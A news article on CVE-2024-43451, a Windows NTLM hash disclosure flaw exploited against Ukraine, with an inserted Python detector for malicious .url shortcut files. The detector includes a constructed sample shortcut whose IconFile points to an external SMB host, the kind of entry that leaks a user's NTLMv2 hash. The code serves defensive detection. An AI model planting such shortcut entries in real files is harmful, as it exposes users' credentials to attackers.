Microsoft patches Windows zero-day exploited in attacks on Ukraine

In a concerning development, suspected Russian hackers have been identified exploiting a recently patched vulnerability in Windows, specifically a zero-day flaw that poses significant risks to Ukrainian entities. This security issue, designated as CVE-2024-43451, is classified as an NTLM Hash Disclosure spoofing vulnerability. It was brought to light by ClearSky security researchers, who highlighted its potential for misuse in cyberattacks.

Details of the Vulnerability

The vulnerability allows attackers to steal a logged-in user’s NTLMv2 hash by forcing the victim’s machine to connect to a server under their control. ClearSky first detected this malicious campaign in June, noting the use of phishing emails designed to exploit the flaw. These emails contained links that, when clicked, would download an Internet shortcut file from a previously compromised server associated with the Kamianets-Podilskyi City Council’s Department of Education and Science.

According to ClearSky, the vulnerability is triggered when users interact with the URL file—whether by right-clicking, deleting, or moving it. This interaction establishes a connection to a remote server, enabling the download of various malware payloads, including SparkRAT, an open-source remote access tool that grants attackers control over compromised systems.

During their investigation, researchers also noted attempts to capture NTLM hashes through the Server Message Block (SMB) protocol. Such password hashes can be exploited in “pass-the-hash” attacks or cracked to reveal users’ plaintext passwords.
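Added as a defender-side illustration (not code from ClearSky, Microsoft or this article): a Python check that parses an Internet shortcut (.url) file and flags fields that would make Windows reach an external host over SMB, the kind of outbound connection described above that exposes the NTLMv2 hash. The INI field names are those of the .url format; the internal ranges, trusted-host list and sample file are constructed assumptions.

```python
import configparser
import ipaddress
import re
from urllib.parse import urlparse

# [InternetShortcut] fields that may hold a UNC path or file:// URL; resolving one
# makes the client send SMB requests, and an NTLM challenge-response, to that host.
REMOTE_CAPABLE_FIELDS = ("URL", "IconFile", "WorkingDirectory")
# Ranges treated as internal (RFC 1918 plus loopback); everything else is external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")

def smb_host_of(value):
    """Host an SMB/UNC-style reference would contact, or None for plain web links."""
    value = value.strip()
    if m := UNC_RE.match(value):
        return m.group(1)
    parsed = urlparse(value)
    return parsed.hostname if parsed.scheme == "file" and parsed.hostname else None

def is_internal(host, trusted_hosts):
    """True for allow-listed names and for addresses inside INTERNAL_NETS."""
    if host.lower() in trusted_hosts:
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name not on the allow-list counts as external
    return any(addr in net for net in INTERNAL_NETS)

def find_external_smb_refs(url_file_text, trusted_hosts=()):
    """Return [(field, host)] for each field that points at an external SMB host."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep the field names' original case
    cp.read_string(url_file_text)
    trusted = {h.lower() for h in trusted_hosts}
    hits = []
    for field in REMOTE_CAPABLE_FIELDS:
        host = smb_host_of(cp.get("InternetShortcut", field, fallback=""))
        if host and not is_internal(host, trusted):
            hits.append((field, host))
    return hits

# Constructed sample: the link is a harmless web URL, but the icon is pulled
# from a UNC path on an external address.
SAMPLE_URL_FILE = """[InternetShortcut]
URL=https://example.invalid/report.pdf
IconFile=\\\\203.0.113.10\\share\\icon.ico
"""
```

Running `find_external_smb_refs` over shortcut files arriving by mail or found in user profiles gives a quick triage signal; a hit is worth pairing with outbound port 445 telemetry from the same host.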

ClearSky promptly shared their findings with Ukraine’s Computer Emergency Response Team (CERT-UA), which linked these attacks to a threat group known as UAC-0194, believed to have Russian affiliations.

Attack flow (ClearSky)

In response to these revelations, Microsoft acted swiftly, patching the vulnerability during the November 2024 Patch Tuesday. The tech giant confirmed ClearSky’s assessments, emphasizing that user interaction is essential for the successful exploitation of this vulnerability. Microsoft’s advisory stated, “This vulnerability discloses a user’s NTLMv2 hash to the attacker who could use this to authenticate as the user.” They further clarified that even minimal interaction with a malicious file—such as selecting, inspecting, or performing any action other than opening or executing—could trigger the vulnerability.

CVE-2024-43451 impacts all supported versions of Windows, including Windows 10 and later, as well as Windows Server 2008 and newer. In a related move, the Cybersecurity and Infrastructure Security Agency (CISA) added this vulnerability to its Known Exploited Vulnerabilities Catalog, mandating that organizations secure affected systems by December 3, as outlined in Binding Operational Directive (BOD) 22-01. CISA cautioned that such vulnerabilities are common attack vectors for malicious cyber actors and pose considerable risks to federal enterprises.
